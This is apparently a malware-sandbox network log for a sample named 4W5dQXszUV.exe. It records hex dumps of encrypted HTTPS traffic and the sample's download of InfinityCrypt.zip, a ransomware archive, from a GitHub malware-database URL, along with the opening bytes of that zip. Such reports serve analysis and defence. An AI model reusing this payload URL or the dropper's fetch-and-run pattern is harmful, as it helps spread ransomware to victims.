                                                                                                        2022-09-29 12:45:00 UTC274INData Raw: 25 1f 5e a1 06 2b 66 a9 f7 48 81 b5 01 7d df 1a 0c aa 4c 39 62 c0 9b db 44 3b f0 90 62 c8 9f f1 31 f1 88 a5 a0 4e 15 99 7d 3d 5e 61 eb 32 33 ff 06 4c 23 3b 2b 76 c9 2d 62 12 9d 11 66 36 79 7f db 00 1c 23 6d fe 48 d2 1b ff 6a ad 76 c1 58 2d bf 7f 40 7d 84 d1 45 13 8c 23 3a 11 fc 09 13 f6 0d 02 b6 7e 13 b0 1c 04 d8 b9 bf 32 f9 04 f5 9e 08 e9 47 81 a9 b4 8b 71 80 4b fe c8 c1 4d c5 37 b5 c9 a1 c5 62 82 6f 94 4a 07 05 82 59 fa e3 a1 27 de b6 7d 1f ad d9 69 34 a3 e9 38 6d 59 51 2a 72 4d 31 97 a5 ff 74 d5 d5 91 f1 72 5f a1 1e c4 c8 97 f3 73 4a 7d 96 9c db 11 5f ca 80 1a b3 20 0c d6 da 9e 54 b9 31 6b 06 2e b1 a7 f4 14 c2 c6 64 2b 04 5a d6 9d 58 b6 0b fe ab e0 92 50 ed 61 44 f5 ac 00 91 e0 40 6a fd b1 4b 06 77 d9 db cf 3d bf 13 c8 0b 08 11 55 ab 7a 58 f5 88 c4 d6
                                                                                                        Data Ascii: %^+fH}L9bD;b1N}=^a23L#;+v-bf6y#mHjvX-@}E#:~2GqKM7boJY'}i48mYQ*rM1tr_sJ}_ T1k.d+ZXPaD@jKw=UzX
                                                                                                        2022-09-29 12:45:00 UTC290INData Raw: 6f 4b 26 b6 48 55 3f b0 5b f8 73 55 40 f2 c6 f8 0a 51 4f 4c 32 3c f6 4c d9 41 35 36 7e 17 bb 8b a1 cc 2d f1 4f f1 52 0a f7 a4 69 45 6d c1 5b 40 51 91 c7 23 4f 8d d8 ff 20 d2 f9 92 e2 ed 9b 31 62 6b 1d eb 08 2f ba 40 1b 6e 1f b9 f4 fd ac d7 ef a1 27 44 ed ed 69 66 6c 10 e7 51 5f 7d 25 2f 00 01 57 c0 81 93 e6 ae 5d 9e 93 ff 5e 88 31 cb 2d 13 66 04 b2 cd ea 10 38 6d b3 bb 47 d0 fa 68 10 6a e5 b4 d1 f3 09 53 77 c6 28 7b fe 24 31 ad c6 82 35 cc 6b ec 7b dc 94 5e 3b c3 8d 94 d7 fa 5b 89 07 12 47 75 ee fd b1 3b 25 9b f9 44 14 e3 73 ab 84 2a e4 e4 9c 4b 35 f2 a6 25 f2 fe c3 da 0b 59 7b 28 c0 7f d7 1b b7 7a ae 6a a8 13 c0 dc ec db 2f 11 a8 8b 46 7f c1 64 fc b6 2a aa 0b 10 3c db 7f 9f eb 35 d0 d5 72 ab 93 df dc 25 eb bf 2c 75 2c f3 75 9d 74 b3 32 b0 c4 a6 78 fa 05
                                                                                                        Data Ascii: oK&HU?[sU@QOL2<LA56~-ORiEm[@Q#O 1bk/@n'DiflQ_}%/W]^1-f8mGhjSw({$15k{^;[Gu;%Ds*K5%Y{(zj/Fd*<5r%,u,ut2x
                                                                                                        2022-09-29 12:45:00 UTC306INData Raw: 92 8d 4d 0f 81 9c 2b c3 0f 1e 60 bc 72 87 c2 f1 f5 71 0f 29 69 ca f3 b1 05 cd 66 db 6e d3 dc 21 44 88 cb 8d e5 bb 51 5e 35 36 89 f1 15 7b c2 5f d5 66 33 08 04 a0 a1 cd ea 00 cf 82 74 53 71 ee 61 56 dc 37 2c 20 75 1f 59 55 05 60 d3 d2 af 1d 35 2e e7 65 41 d8 c0 4c af c8 4c 32 2e 19 f5 aa 52 88 fa 01 39 ee bb 29 f5 19 14 61 fc 61 f4 04 34 e4 14 72 49 ef f5 80 52 24 a2 95 fc c9 69 30 21 9f 3e a7 98 ea ed cf 95 df 72 ac 08 b6 1a 1a 65 2c e7 ff 2f 8c 0c 08 59 b4 43 4e 3a 3d 5f 59 2b 3e 06 78 ed e5 2d 83 5b 1f cc ac 50 03 c0 d2 3d 9b 35 e1 54 a4 4f 97 3a a5 1a de 4e 38 02 49 a0 63 16 de b8 6f 57 50 08 3c b2 11 01 e3 56 1a 86 d9 a4 21 54 2b 1e 2f e5 f6 9b 5e b2 1c 05 e1 c6 6b 4a a1 4a 4b 38 30 44 21 41 d5 72 1f 4a af bc bd a8 c5 f0 2e c4 b4 5e 2a 0d 0b a1 5b d1
                                                                                                        Data Ascii: M+`rq)ifn!DQ^56{_f3tSqaV7, uYU`5.eALL2.R9)aa4rIR$i0!>re,/YCN:=_Y+>x-[P=5TO:N8IcoWP<V!T+/^kJJK80D!ArJ.^*[
                                                                                                        2022-09-29 12:45:00 UTC322INData Raw: 84 5e 6b ad 9e dc 39 9d 38 6f 59 04 11 4d 51 38 44 da f5 2a 43 0e f0 1a 26 4c ab 42 a9 52 4a c9 45 fc 3b 14 70 16 63 17 10 6f 0d f7 c2 3d 73 44 bd 89 a0 78 f9 91 3e 11 74 fc a4 d0 48 db 4b ee b3 3e a7 8e 51 79 69 aa a9 b3 fb e8 1e cf a2 a7 eb 2d 9a 7b 83 d4 b8 a9 0b 1d 7e b5 0a 5d 65 c6 f2 65 4b 07 55 22 9b ba e1 0f d6 19 1f 88 ab 12 54 38 00 7a 5f d5 f8 9f 6b 01 44 6a 1b fa f6 93 c1 d9 4c 7a f5 1f ec f7 29 b6 16 dd 24 a4 a6 1f c5 3f 6e f3 7c 93 59 1a 96 89 5f 59 2d 6c c6 e5 bc 3c 61 34 4f 41 d2 f1 d0 49 c4 95 03 64 53 3f 5f a7 8f 1d ad ed 8f 00 4a 2f d2 04 15 4d 6c e0 99 0e 53 0d 39 24 78 a7 64 4c 00 2c 6a 7b fc aa 67 7b 5f 6e bc ba 70 c7 0c 18 7b 57 48 6e 74 07 f4 a2 d4 ee 06 e1 0a 80 06 b9 9b 5f a7 79 0a eb ed 5a 86 1e 25 f4 ca d2 70 0c 40 67 e2 fc bf
                                                                                                        Data Ascii: ^k98oYMQ8D*C&LBRJE;pco=sDx>tHK>Qyi-{~]eeKU"T8z_kDjLz)$?n|Y_Y-l<a4OAIdS?_J/MlS9$xdL,j{g{_np{WHnt_yZ%p@g
                                                                                                        2022-09-29 12:45:00 UTC338INData Raw: 22 1e d3 c7 13 95 1f f2 12 6a a9 7e be 2e d7 e9 4a 4d 35 d9 36 8b 35 fd e1 09 6c d2 19 43 19 38 06 7e ad bd 50 39 41 9a a5 e5 7d d5 d3 d7 8b 8b d2 50 9a 44 73 4c 1b 71 54 55 9c 61 e2 50 c5 95 69 0c 6c 74 fb b5 74 cc e2 4e fb 7e 4c 58 7b 3b b7 99 b3 29 51 e6 45 58 40 e7 06 6d 3c e3 f4 73 42 77 53 e6 54 45 16 bc 45 8f f9 0d fa 0b 6a df e8 18 28 1a 36 2c 13 ba 09 76 f2 57 6d 7c 34 af 84 c9 be 94 f5 7d 7d 08 9e 37 50 04 29 9e e1 5f e6 4b 1e 80 eb af db ce 7d 72 ee 70 59 c6 63 e2 f3 5c 21 b3 f6 12 8e 52 a3 2c 54 79 1f ac 5f a6 14 87 69 16 73 d9 fa ab c9 d0 32 29 f1 72 72 77 5a 5f fd 64 91 01 a7 7a 50 13 dc 27 54 e9 d3 2b a7 8e 32 4b d6 b7 86 c7 40 ad d2 0e 77 01 68 ab 13 58 08 23 43 70 e4 e5 f6 70 9c e6 92 72 fa 66 01 3c 3f cf 6e 5a 43 6d 42 d4 49 61 03 b1 8c
                                                                                                        Data Ascii: "j~.JM565lC8~P9A}PDsLqTUaPilttN~LX{;)QEX@m<sBwSTEEj(6,vWm|4}}7P)_K}rpYc\!R,Ty_is2)rrwZ_dzP'T+2K@whX#Cpprf<?nZCmBIa
                                                                                                        2022-09-29 12:45:00 UTC354INData Raw: 52 35 d1 8e e4 ab 1b e0 4c e2 5e 21 77 79 13 c6 01 94 cc d5 79 f8 8b 4a da d5 7c c9 f7 25 ff 7c 81 56 e7 68 60 fb cc e4 76 71 69 be 72 03 d9 fb cd 69 a5 dc 74 ae a8 97 17 b0 77 f7 18 85 54 b7 db fb 9b 55 e0 bc 20 d2 8e 30 87 5d 63 42 22 a2 6f 17 ab 6a 13 ef 69 30 18 46 37 01 5d 76 08 3e 59 fa 27 90 2b 66 e5 43 d1 aa cc 83 d0 2d 38 29 dc 78 a4 23 b1 79 f8 ae 7c 8a b0 63 18 c7 d4 a3 e2 d8 a9 68 cd 63 2c ab 8a 0f fd 79 ea e3 e5 e3 06 bf c6 f4 72 41 6b 17 e7 65 3c d4 7c c1 1e 52 be 48 e3 35 7c b7 5e 7c b2 9b 1b 2b 8e 22 ad 92 99 66 89 d3 12 80 b4 8b 3f d4 f2 c1 f1 e3 8e 4c 85 a3 32 8e a7 4a 62 7e 37 e9 14 12 d8 8b 10 63 bc 00 c1 5f 36 f2 f8 9c a6 e5 b0 e4 1d 8e fe d2 17 31 cf 6f 99 cc cf be 4f e6 30 ed e5 0d 6b bc b1 bb 12 f1 52 89 9a 9f 05 a1 1f f0 da 2e b0
                                                                                                        Data Ascii: R5L^!wyyJ|%|Vh`vqiritwTU 0]cB"oji0F7]v>Y'+fC-8)x#y|chc,yrAke<|RH5|^|+"f?L2Jb~7c_61oO0kR.
                                                                                                        2022-09-29 12:45:00 UTC370INData Raw: f9 e8 4f e7 36 b0 55 32 38 31 a5 17 a7 d8 45 bc 06 28 bc b4 5f e5 ce aa 58 3f 31 0b 48 ca 07 70 fa fe 44 3c 11 ce e2 53 21 92 01 7e 17 42 46 d8 ac 49 a0 42 0d 4d a1 3d 45 c5 7e 0c 9a ba 4c d1 9f 16 1c 97 c6 75 90 e4 01 b7 f6 fe ff d6 fb 64 76 36 50 c2 40 3b fa 2e 26 64 ff 2d 2b b5 84 a7 39 7b b8 b4 a2 1c f5 7d a0 57 b0 d7 fe 7a c5 5e 2a 45 d0 f0 34 14 e6 de d2 be 76 ee 37 24 3b 03 c2 68 09 ba 78 b7 8a 46 b6 32 64 f9 7c b4 38 26 f6 12 5d e3 a7 61 84 85 dc f6 04 61 d7 2c a8 e5 2a f6 df 93 b0 61 9f e3 44 b3 28 f9 29 39 84 0c 64 7d 7f 0f 4c 20 62 f5 13 54 fe ec 15 06 26 0a 8a 06 f6 af 55 d9 d4 03 fd d5 a4 dd 6d 81 6a 4f a3 1c b3 dd 41 33 c0 5d 46 cb 36 d2 6d 68 39 d7 7e a8 38 04 7e 33 75 06 a1 50 83 36 d5 6f 28 8c b9 22 58 12 4e dc 97 ca 44 d9 61 7a 37 27 bd
                                                                                                        Data Ascii: O6U281E(_X?1HpD<S!~BFIBM=E~Ludv6P@;.&d-+9{}Wz^*E4v7$;hxF2d|8&]aa,*aD()9d}L bT&UmjOA3]F6mh9~8~3uP6o("XNDaz7'
                                                                                                        2022-09-29 12:45:00 UTC386INData Raw: ff 00 3f 2f 78 26 0f cc 24 4e ab db d0 58 6d 23 9d 4f c0 aa ba 72 84 87 4d 31 6b 36 23 71 4c a3 c8 b8 2c 6b 2e 79 61 f6 97 68 dd 9e e2 ca b4 b6 eb fe 89 c6 9d 4e f5 4e ce 3d 15 1d 7a a7 16 e7 ad 9e dc 66 20 7c 96 d1 15 f6 cb 19 43 6a ea c8 b0 33 9b 14 ef 64 82 0e 5a 94 57 b3 8d 19 1c 3e 48 4d c9 5e 88 aa 8b 1d 96 d7 9a 40 ad 6c 95 ab a3 ce 3e b2 1d 00 9d 2b f4 3b 0b 0b bf 0a e4 8e 51 9d 31 65 d4 59 b5 27 aa 59 eb fe f7 71 cc 81 59 a1 9a d5 af f2 51 af 45 14 ab 68 46 ff 57 fa 15 b6 7d bf 27 20 f5 03 af c1 ba 9e e1 f6 e8 3f dd 7d 05 fe 08 e6 f9 33 b1 5e bc 37 17 18 0b 71 81 6f 37 de 8b 1a 6a f7 72 c8 4f 33 6e 4a cd 17 07 f3 dc 8a a1 bb 28 77 5b e4 de d2 9f af dd 0b 76 91 9b b8 e4 02 b4 f1 01 81 22 1a 1e ac 21 ee 8e e8 05 27 e6 5f 63 42 d8 f8 a5 9b 46 35 ee
                                                                                                        Data Ascii: ?/x&$NXm#OrM1k6#qL,k.yahNN=zf |Cj3dZW>HM^@l>+;Q1eY'YqYQEhFW}' ?}3^7qo7jrO3nJ(w[v"!'_cBF5
                                                                                                        2022-09-29 12:45:00 UTC395INData Raw: 89 d9 04 7b 1a 72 5f 70 e3 b9 d5 f4 a1 e0 04 fd 95 77 63 91 53 e4 07 43 2b 28 85 21 97 46 c6 4e 21 82 14 4c 3a af 50 52 7b ed 80 ef ab ad a4 42 8e e0 fb c5 cc ff 0f b5 56 59 aa 74 3e 4e 4b 8b c1 a5 63 71 55 98 97 e1 ad 42 09 81 13 e8 a0 2c 1f b1 fd 02 2c 91 d3 9a fd 45 25 05 f5 3a b0 b2 d0 85 bf 9a 7d 81 22 e3 dc ee 3f 7d c1 4e c2 96 88 ae f6 b7 c9 ca 38 5b a5 c4 49 e8 d0 88 31 d7 7f 83 20 46 34 c9 c5 c6 63 f8 10 de 16 e2 b0 76 4e eb 90 e5 04 67 52 df 26 ae 47 23 d0 61 26 b4 60 f0 9a 52 00 8f bd 23 9f 09 38 74 16 b8 56 c2 d9 2a 02 42 cd 0c b4 9d ba 3d 01 5e 73 f8 c5 38 09 bd c7 8e bb 45 60 fa 4b af 5a 35 a5 89 e0 30 af c6 61 19 96 c4 7a 5a ef cd 4c da b2 87 4d dd 35 bf 42 5d fc de 42 e1 71 df 14 05 6b ff 2c f8 84 cc 43 1c ce 06 50 3f dd ba 0d 2c 81 44 20
                                                                                                        Data Ascii: {r_pwcSC+(!FN!L:PR{BVYt>NKcqUB,,E%:}"?}N8[I1 F4cvNgR&G#a&`R#8tV*B=^s8E`KZ50azZLM5B]Bqk,CP?,D


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        10192.168.2.449718140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:13 UTC1113OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:45:13 UTC1113INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:09 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:45:13 UTC1114INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        11192.168.2.449719185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:13 UTC1116OUTGET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:45:13 UTC1116INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 34300
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "560b96c943fc1b2cc0e25aa37950118e12457060c5829c2b558cdd36323f6802"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 0802:540B:2BBD66:3824C3:6335932B
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:45:13 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6953-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455514.884608,VS0,VE1
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 2d8d84f21dc3de7eb128b48bcf3d77baea8e5245
                                                                                                        Expires: Thu, 29 Sep 2022 12:50:13 GMT
                                                                                                        Source-Age: 46
                                                                                                        2022-09-29 12:45:13 UTC1117INData Raw: 50 4b 03 04 14 00 01 00 08 00 05 80 55 4d 73 32 bc 1b 3e 85 00 00 00 4c 03 00 1c 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 49 6e 66 69 6e 69 74 79 43 72 79 70 74 2e 65 78 65 82 87 5a 39 90 6f 1d 4b 56 8c 6f a5 78 75 67 df b9 5d 1b e7 c8 de 51 7e 50 59 e3 51 55 6b 55 48 f4 fd 3a ce 54 5a 2e e4 e9 b5 45 cd 28 59 f7 4e ba 07 6e e5 b7 9f ae bb 8e 1b b9 29 ca 82 bd 23 6d 87 ef ce 14 40 b3 aa 88 93 6c cd 38 c9 6b 8f f5 5c 89 57 2c 56 38 77 b2 d9 b4 13 71 55 9c a0 8f ea 4e e3 7c 56 be 4e 74 51 2a e5 23 32 c4 59 6f 50 84 15 53 3b c3 7d 7c 29 80 9c 4e c8 31 f9 27 3f f8 1d 7f 92 10 30 65 9c 61 49 18 4d af bb 52 c4 c6 5a 72 01 0d 3d 7d 39 80 54 2b cd c4 d2 9f b3 f0 40 5d 9b e5 dc ab 59 bb d8 29 21 91 f7 7a 11 f3 62 7b 82 05 97 bb ef f9 6b 35 d2 43 eb 1d 57 43 55 0a
                                                                                                        Data Ascii: PKUMs2>LEndermanch@InfinityCrypt.exeZ9oKVoxug]Q~PYQUkUH:TZ.E(YNn)#m@l8k\W,V8wqUN|VNtQ*#2YoPS;}|)N1'?0eaIMRZr=}9T+@]Y)!zb{k5CWCU
                                                                                                        2022-09-29 12:45:13 UTC1118INData Raw: 31 84 61 77 b6 e3 c9 b2 da 75 c6 fa 65 a5 e9 aa c3 75 e8 3a d7 90 b5 dc 6a 53 45 eb ed 0a b9 1d 24 b2 c1 7e da 22 8a 62 db 0d 02 2b 2f b4 18 81 e8 f4 15 82 a8 a1 41 3a 78 e0 bc a2 3c 90 67 40 1e 1d ff 73 6c ba 96 e0 67 29 52 b9 ad 8d fc ac 7e 00 ef a4 77 2c 98 34 4d 13 52 e1 41 b0 97 2c 53 fd 4c 71 46 9e 56 50 70 47 69 7c ed 5c a5 40 f9 4b e8 93 5e 7a 82 39 df e2 48 d8 e2 76 12 79 b6 92 03 be e3 af bf fc 58 d5 ed 38 bf 0a 7d f1 8b 9b eb c2 95 a7 44 af 7a e1 a2 e0 16 93 90 6e 04 81 f0 74 7f 3d 12 5c b6 40 90 ac fa 1a 85 fc 53 33 0f 75 b1 9b 22 d8 0a 1d c4 03 cd e2 db cb 30 cc d2 98 b6 8e 49 fe b3 f8 08 bc cb 18 60 6d 04 a0 b2 f1 3f 66 77 0f b2 18 86 ea 48 b8 69 da 1c 96 e1 85 7e 6b 92 6f 29 c0 4e 78 ae f2 8b cd 7b 83 02 2a 8b dd 97 64 9e c2 0b c7 ea 92 de
                                                                                                        Data Ascii: 1awueu:jSE$~"b+/A:x<g@slg)R~w,4MRA,SLqFVPpGi|\@K^z9HvyX8}Dznt=\@S3u"0I`m?fwHi~ko)Nx{*d
                                                                                                        2022-09-29 12:45:13 UTC1119INData Raw: 67 ff 25 ef e2 d5 38 39 2a 01 18 c5 98 77 49 c4 f5 60 e4 74 53 1b 7a a3 ae 31 94 71 cf e6 3b a7 df fd af 55 0c c5 2e 29 fe d7 0c 03 b0 4f ba b1 7d eb 34 fc ef 2c 74 15 98 88 eb 79 53 4e e3 e2 01 da 5a a2 24 2f e6 62 c9 1d 4f e7 7e 8a e8 e2 bb aa 3d 4f 40 b2 1c 2b 83 ac 7a f1 cf c6 c6 67 50 80 02 9e d9 04 7e 31 4f 3a 77 16 a3 3c 54 7e 34 cf 67 de dc 30 7e 1c 7f ee 45 d3 87 33 d5 ea cd 9f 13 25 1f 4c 65 4f a7 a0 ab 9e 4a 7c 73 41 49 cb 6c e5 34 10 09 58 bc cf d6 85 a3 ba ad f2 7e 58 1d 28 5b e0 40 e7 7a 10 3a 65 06 2f db 29 b3 8d d7 b2 af 82 b4 8b e8 fe 33 19 85 7c 3c 31 af bb 23 36 05 23 0b 98 0e 10 24 3e a3 a2 7f 3b 5d bc 56 17 39 ff c1 4c e9 98 de a9 ab df e2 a9 8b b3 33 4b 7c 32 29 01 0d 02 1e 20 fb 0a 2e 6e 8c 75 b1 c0 62 cf b9 d3 53 57 3a d6 9b 7d c1
                                                                                                        Data Ascii: g%89*wI`tSz1q;U.)O}4,tySNZ$/bO~=O@+zgP~1O:w<T~4g0~E3%LeOJ|sAIl4X~X([@z:e/)3|<1#6#$>;]V9L3K|2) .nubSW:}
                                                                                                        2022-09-29 12:45:13 UTC1121INData Raw: ec 70 20 ea c0 12 5f e1 f2 c0 af 3d f3 05 8f ef 69 21 e1 cf d1 7c 18 9b d4 f8 03 a2 23 df 57 95 9d 45 f9 e6 e8 f2 95 b9 2b 9a ed a4 b4 5e c8 04 94 00 d8 7c cc 0a 86 42 b4 15 1f df 8a 33 65 b1 7c 84 d9 77 b2 19 9b ca 06 46 97 30 55 4a 43 97 83 47 c9 5e 5c b5 7d af a7 c3 5f d9 ee 2c 4c b0 90 f6 d5 08 8e a3 c0 6f da 0d 7a 2e 02 db 93 57 2f d2 12 3f 45 b8 29 8c 58 fa f6 08 ef 92 03 51 52 7a 9b 73 e4 3c 5b 23 80 59 19 46 9e f5 40 96 e4 09 c8 02 cb 5f 15 f6 13 10 b8 76 85 79 f0 1d 9e ba 47 1f 31 a4 8e 20 a4 98 63 41 57 be 52 e8 74 5e 7a 7f d7 0d 9e b0 a5 f6 06 41 52 81 a8 ce 9c ea 70 f4 1a 20 ed d2 88 01 4d 9a aa c6 c4 69 d9 09 a6 45 ae 37 a2 24 76 19 dd 24 45 f1 c6 3f c1 ca 75 59 73 11 59 e1 56 e4 d0 1c cc 43 65 c4 17 d7 d4 c7 49 48 f8 69 ee 1e 25 4e 96 83 72
                                                                                                        Data Ascii: p _=i!|#WE+^|B3e|wF0UJCG^\}_,Loz.W/?E)XQRzs<[#YF@_vyG1 cAWRt^zARp MiE7$v$E?uYsYVCeIHi%Nr
                                                                                                        2022-09-29 12:45:13 UTC1122INData Raw: 55 fd 69 fe bf 20 83 be 4c a5 aa a7 62 29 fc 69 41 a5 d2 b9 e4 d0 08 3c 2d 1a 3b 02 73 39 88 c1 ae e1 29 95 97 42 09 84 6f 0d 06 11 24 82 ac 12 d3 39 3e 18 59 95 1e 30 ab 33 95 c1 15 65 c2 33 1e 3f 67 69 4b b2 19 db 58 09 42 81 2d 49 2c b7 8d 04 4d 32 c0 81 5e 66 81 f2 5b 1b 1b d4 f4 ed 87 60 9c a2 1d b3 1b 76 9b 42 6b c3 33 e7 b2 77 89 18 37 9b 7e 91 33 44 f6 a3 59 10 ce 66 79 14 ed 58 fb aa 46 45 fb 97 61 ca d6 0b 95 8b 06 b1 d6 3e 21 33 3b 82 28 a4 c1 95 f7 72 97 29 22 bf ed 9e 2a 4a 48 c1 e4 96 54 4a 23 a1 bd f9 39 de a1 8c 0f e2 62 f5 d3 fa 30 9e ba 36 c5 ea 3a a6 b1 5b 6b b4 5e 5a 0e 56 77 e7 e6 40 4f 81 63 f0 7b bb 8e a3 83 49 fe b5 d9 4d 2b 23 71 96 3a 02 4a d4 bc b1 85 a5 be b4 48 ed df 14 d5 c3 09 a9 51 3d f0 0b c8 49 e2 a3 db 81 a0 8e 7f 7c 52
                                                                                                        Data Ascii: Ui Lb)iA<-;s9)Bo$9>Y03e3?giKXB-I,M2^f[`vBk3w7~3DYfyXFEa>!3;(r)"*JHTJ#9b06:[k^ZVw@Oc{IM+#q:JHQ=I|R
                                                                                                        2022-09-29 12:45:13 UTC1123INData Raw: ee 93 ef cd 2b 61 96 54 02 33 f2 11 0b 65 07 c6 fd f2 43 3b 33 e3 4d 54 09 ee 54 d8 03 0e 2e 8e 89 0d 31 73 1a dc c9 d7 ab 7e 8d 8b 13 50 bc fc 49 cd 0d fe 20 5d e9 53 6b 8a e6 03 0a 5e b8 7f 01 aa 40 28 20 88 ce 05 85 8d 7d e9 78 74 f3 c7 c1 44 b9 60 b1 f0 bf 45 49 e9 33 3c 9d ab 65 cf 1e 73 84 9a d1 27 4e 3a 43 bb 46 1b c0 28 8e bb c6 b9 eb e0 e9 23 9a 39 82 f1 f3 1c e1 85 c0 3a e5 97 2e c2 69 af a2 b7 d2 05 09 7b 19 f3 29 46 5c d8 39 58 33 dc f4 dc ca 26 4f 88 93 fc fd 45 2c 01 10 ee a8 ae e6 5a c3 fc 06 19 96 38 0c 48 d1 b6 81 d4 81 0d e0 2b b5 53 98 55 5a e1 5a d9 87 af fb f8 51 98 3a 23 e1 75 70 91 a5 e8 62 27 97 d9 a9 2a 2b 75 62 50 80 4f 03 e7 f7 cf 53 d7 cf 7c f0 50 29 15 f1 44 c3 77 70 9d de af be 5e 2e 42 26 91 26 d6 60 fc 66 1b 3c b3 f7 e7 b1
                                                                                                        Data Ascii: +aT3eC;3MTT.1s~PI ]Sk^@( }xtD`EI3<es'N:CF(#9:.i{)F\9X3&OE,Z8H+SUZZQ:#upb'*+ubPOS|P)Dwp^.B&&`f<
                                                                                                        2022-09-29 12:45:13 UTC1125INData Raw: 30 43 ab 6d ae 09 49 eb 61 71 a1 a4 db 5c af 23 ac d2 7b 6e 50 17 e0 14 8c 35 84 d3 d3 14 cb 0e e3 96 e2 36 fa cf fe 0f 9b e2 e9 30 2f 36 5b 8f f4 26 71 41 b5 00 4f 1c 0d 49 2d a9 b6 10 b0 33 45 22 49 7a 12 27 c1 b2 a9 c8 4c 6c a3 8f 55 49 65 f4 db a4 bb e4 06 d1 5c 20 76 ac 8d 47 d4 61 26 c8 49 98 2f 90 e1 e2 1d 93 30 6f 88 3d 1e 29 73 81 c1 e4 51 1f 73 fa 24 c6 9d e8 be 1b 3a df 04 ce 8d b4 95 d7 5d e4 75 6d 48 b3 23 ad 8f 2a 5e f9 93 d3 4e dd 03 5c 4f 12 fd 3f 44 bf 79 0d 27 50 a0 31 a0 ee bd 5f e0 e8 4b 5d 12 1a a1 f1 88 73 92 89 a3 20 96 5b 9c cb c2 9c 9b ca 04 6a a5 d4 fd a1 58 42 92 95 b1 dd ca d2 bf 54 ad ec 95 8c 89 28 0f 97 78 87 1d c4 c2 d0 48 12 21 7a 38 94 b3 88 7a ec 75 a9 d2 84 be f7 45 74 e3 4b 85 f1 a5 50 4c 9e c5 4c 0b 10 34 2a df 04 76
                                                                                                        Data Ascii: 0CmIaq\#{nP560/6[&qAOI-3E"Iz'LlUIe\ vGa&I/0o=)sQs$:]umH#*^N\O?Dy'P1_K]s [jXBT(xH!z8zuEtKPLL4*v
